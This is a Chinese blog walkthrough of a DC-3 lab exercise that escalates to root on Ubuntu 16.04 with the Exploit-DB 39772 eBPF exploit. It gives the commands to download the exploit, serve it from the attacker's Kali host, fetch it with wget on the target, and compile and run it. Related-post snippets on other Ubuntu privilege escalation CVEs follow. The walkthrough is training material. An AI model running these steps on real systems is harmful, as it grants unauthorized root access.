Ubuntu 16.04提权

最新推荐文章于 2024-06-28 13:09:29 发布
最新推荐文章于 2024-06-28 13:09:29 发布
阅读量1k 收藏
点赞数
分类专栏: 内网渗透 文章标签: ubuntu linux 提权 安全 Linux内核
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45305211/article/details/129785911
版权

Ubuntu 16.04提权

📌实验环境:DC-3靶机

搜索一下相关的漏洞利用脚本

┌──(root💀kali)-[~]
└─# searchsploit ubuntu 16.04

请添加图片描述

这里选用一个 4.4.x 相对通用的提权方式(Privilege Escalation表示提权)。

路径在linux/local/39772.txt,即/usr/share/exploitdb/exploits/linux/local/39772.txt

文本写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的链接。
请添加图片描述
在这里插入图片描述

地址如下:

Proof of Concept: 
https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552

Exploit-DB Mirror: 
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

使用wget下载,出现404。

┌──(root💀kali)-[~]
└─# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

在这里插入图片描述

经查询,换到了一个新的地址:https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/tree/main/bin-sploits

┌──(root💀kali)-[~]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

在这里插入图片描述

解压文件
在这里插入图片描述

根据前面/usr/share/exploitdb/exploits/linux/local/39772.txt文件中提到的使用方式进行操作。

在这里插入图片描述

需要将exploit.tar上传到目标主机,并解压运行~

kali启动http服务,将exploit.tar文件复制到网站根目录。

┌──(root💀kali)-[~]
└─# systemctl restart apache2                              
                                                                                                          
┌──(root💀kali)-[~]
└─# cp 39772/exploit.tar /var/www/html

在这里插入图片描述

在目标机器上使用wget进行下载

www-data@DC-3:/var/www/html/templates/protostar$ wget http://192.168.10.146/exploit.tar

在这里插入图片描述

解压exploit.tar文件
在这里插入图片描述

进入解压出来的目录

www-data@DC-3:/var/www/html/templates/protostar$ cd ebpf_mapfd_doubleput_exploit/

并按照39772.txt文件中的方式进行操作。

</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./compile.sh
</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./doubleput

在这里插入图片描述

已经获取到了root权限。

_leyilea
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Ubuntu特权提升漏洞(CVE-2021-3493)
Li-D的博客
04-25 2948
漏洞描述 OverlayFS漏洞允许Ubuntu下的本地用户获得root权限。Linux内核中overlayfs文件系统中的Ubuntu特定问题,在该问题中,它未正确验证关于用户名称空间的文件系统功能的应用程序。由于Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特权。 影响版本 Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM
Ubuntu 16.04提权漏洞复现(CVE-2017-16995)
小千安全
05-06 452
CVE-2017-16995是一个非常严重的漏洞,攻击者可以利用该漏洞来root提权,尽量不要使用低版本的Ubuntu的系统。
【msf】对ubuntu系统进行提权
qq_20410657的博客
10-08 732
查询内核漏洞 寻找内核漏洞-匹配 查找到内核漏洞的文件 使用gcc编译内核漏洞执行程序 上传漏洞执行程序到ubuntu系统 进行shell提权 提权失败 渗透总结
Ubuntu20.04sudo免密提升权限
qq_43496409的博客
06-25 488
编辑sudo配置文件
Linux命令 Ubuntu命令 常用shell命令
七七的博客
10-17 3904
sudo 提权 sudo su su 切换为普通用户 ls ls -l 列出详细信息 cd cd A mkdir a 回到家目录: cd cd / cd ~ 回到上一次操作目录:cd - 回到上一层目录:cd .. pwd 显示当前目录绝对路径 whereis 查看命令在哪儿 [] 可有可无 <>一定有 cmd [选项](- 一个或多个) [参数] (文件路径)...
〖EXP〗Ubuntu 18.04提权Linux 4.10 < 5.1.17 (CVE-2019-13272)
K8哥哥
01-21 3829
简介 Ubuntu 18.04 提权Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272) 测试 // Tested on: // - Ubuntu 16.04.5 kernel 4.15.0-29-generic // - Ubuntu 18.04.1 kernel 4.15.0-20-generic // - Ubuntu 19.04 kernel 5.0.0-15-generic // - Ubuntu Mate 18.04.
解决Ubuntu打开文件ui权限不够
qq_50679120的博客
06-26 413
(114条消息) 解决Ubuntu系统移动或复制文件权限不够_ubuntu复制文件权限不够_白嫖叫上我的博客-CSDN博客
Linux提权常用小命令
08-26 286
有些新手朋友在拿到一个webshell后如果看到服务器是Linux或Unix操作系统的就直接放弃提权,认为Linux或Unix下的提权很难,不是大家能做的,其实Linux下的提权并没有很多人想象的那么难,你真去尝试做了,也许你就会发现Linux下的提权并不难,尤其是一些简单的提权方法是很容易学会的。Linux下的提权我知道的比较简单的方法都是在命令行下完成的,很多新手叉子可能根本没接触过...
ubuntu16.04.7镜像
03-02
ubuntu-16.04.7-desktop-amd64 下载链接:https://blog.csdn.net/kt1776133839/article/details/123229169
钉钉 for ubuntu16.04
03-20
【钉钉 for Ubuntu 16.04】是一款专为Ubuntu 16.04操作系统设计的钉钉桌面客户端,让Linux用户也能享受便捷的企业级通讯体验。在Ubuntu上安装这款应用,通常需要通过Debian包(.deb)格式进行。下面我们将详细探讨...
ubuntu16.04 mysql5.7 离线包及依赖
03-24
内网环境安装mysql5.7数据库所需deb安装包,libaio1_0.3.110-2_amd64.deb ,libmecab2_0.996-1.2ubuntu1_amd64.deb ,libmysqlclient20_5.7.25-1ubuntu16.04_amd64.deb,libmysqlclient-dev_5.7.25-1ubuntu16.04_amd...
ubuntu16.04安装GCC5.4
01-20
官网下载源码 ...解压文件 tar -zxvf gcc-5.4.0.tar.bz2 //解压 安装 cd gcc-5.4.0 //进入解压后的gcc文件夹 ./contrib/download_prerequisites //下载依赖项 cd .. mkdir gcc-build-5.4.0 cd gcc-build-5.4.0 ...
Ubuntu16.04离线安装包vsftpd
12-06
下载后解压上传至指定目录,使用以下命令安装 dpkg -i vsftpd_3.0.3-3ubuntu2_amd64.deb
Ubuntu 16.04特定内核提权复现(CVE-2017-16995)
sGanYu
07-17 972
Ubuntu16.04版本存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPFbpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题,攻击者通过普通用户权限可以利用该漏洞进行提升至高权限用户,获取root权限,目前,主要是Debian和Ubuntu版本受影响,Redhat和CentOS不受影响。进入/tmp目录,将linux-exploit-suggester-2.pl传输至tmp文件夹。通过Xftp建立远程连接,用户名hack,密码123456。...
Ubuntu内核提权(CVE-2017-16995)
weixin_68652890的博客
04-15 749
内核提权 环境: 墨者靶场 工具 msf linux-exploit-suggester-master xshell 利用 xshell连接发现是hack权限 上传linux-exploit-suggester.sh到服务器 Possible Exploits:   CVE-2017-16995   CVE-2016-5195 CVE-2016-5195也可以利用 我们这里利用CVE-2017-16995进行提权 影响 CVE-2017-16995 Linux
获取ubuntu管理员权限
weixin_42584507的博客
02-13 4024
Ubuntu 中,要获取管理员权限,有以下几种方法: 使用 su 命令:在命令行中输入 "su" 并输入密码,即可切换到 root 用户。 使用 sudo 命令:在命令行中输入 "sudo 命令",并输入当前用户的密码,即可以管理员权限执行命令。 请注意,在 Ubuntu 中使用管理员权限是需要谨慎的,因为一些不当操作可能会对系统造成严重的影响。 ...
Ubuntu 16.04.2提权
热门推荐
March
01-29 1万+
系统版本为Ubuntu14.04.5 cat /etc/issue Ubuntu 14.04.5 LTS 查看当前权限 id uid=33(www-data) gid=33(www-data) groups=33(www-data) 网上搜一下有没有exp,然后找到一位博主,下载链接为:https://cyseclabs.com/exploits/upstream44.c 因为用户权限过低,无法在...
Linux】——Ubuntu提权(待解决)
给你一半糖
12-31 2277
最近一直在因为项目的需要,需要安装Linux系统,因为自己之前从来没有接触过这方面的内容,从零开始遇到了很多让我自己措手不及的问题,其实关于这个问题现在也还没有解决。     关于如何在Ubuntu提权,按照百度经验上的方法,因为我本身为了省事,选择了永久提权。    第一步:输入sudo gedit /etc/passwd       第二步:将当前用户之后1000:1000两个均改
ubuntu 内核版本
最新发布
m0_73640344的博客
06-28 901
选择哪个内核启动通常由GRUB引导加载器决定,该设置基于GRUB配置文件中的条目排序。用户可以在系统启动时进行选择或通过修改GRUB配置文件来更改默认设置。这为Ubuntu用户提供了灵活的管理和选择不同内核版本的能力,以满足不同的系统需求和偏好。在Ubuntu系统中配置GRUB来选择默认的内核版本或修改启动参数需要编辑GRUB的配置文件。
ubuntu16.04
09-12
Ubuntu 16.04Ubuntu操作系统的一个版本。要下载Ubuntu 16.04,可以打开浏览器,找到Ubuntu的官网,然后点击【系统桌面】,再点击【下载Ubuntu】,接着点击【其他下载】,最后点击【查看历史版本】,在列表中找到【ubuntu-16.04.7-desktop-amd64.iso】并点击进行下载。 安装Ubuntu 16.04的步骤如下: 1. 打开安装程序,选择【安装Ubuntu时下载更新】,然后点击【继续】。 2. 选择【清除整个磁盘并安装Ubuntu】,然后点击【现在安装】。 3. 点击【继续】并继续完成后续的设置。 4. 在安装过程中,选择合适的地区,并点击【继续】。 5. 设置用户名和密码,并点击【继续】。 这样,你就可以成功安装Ubuntu 16.04了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值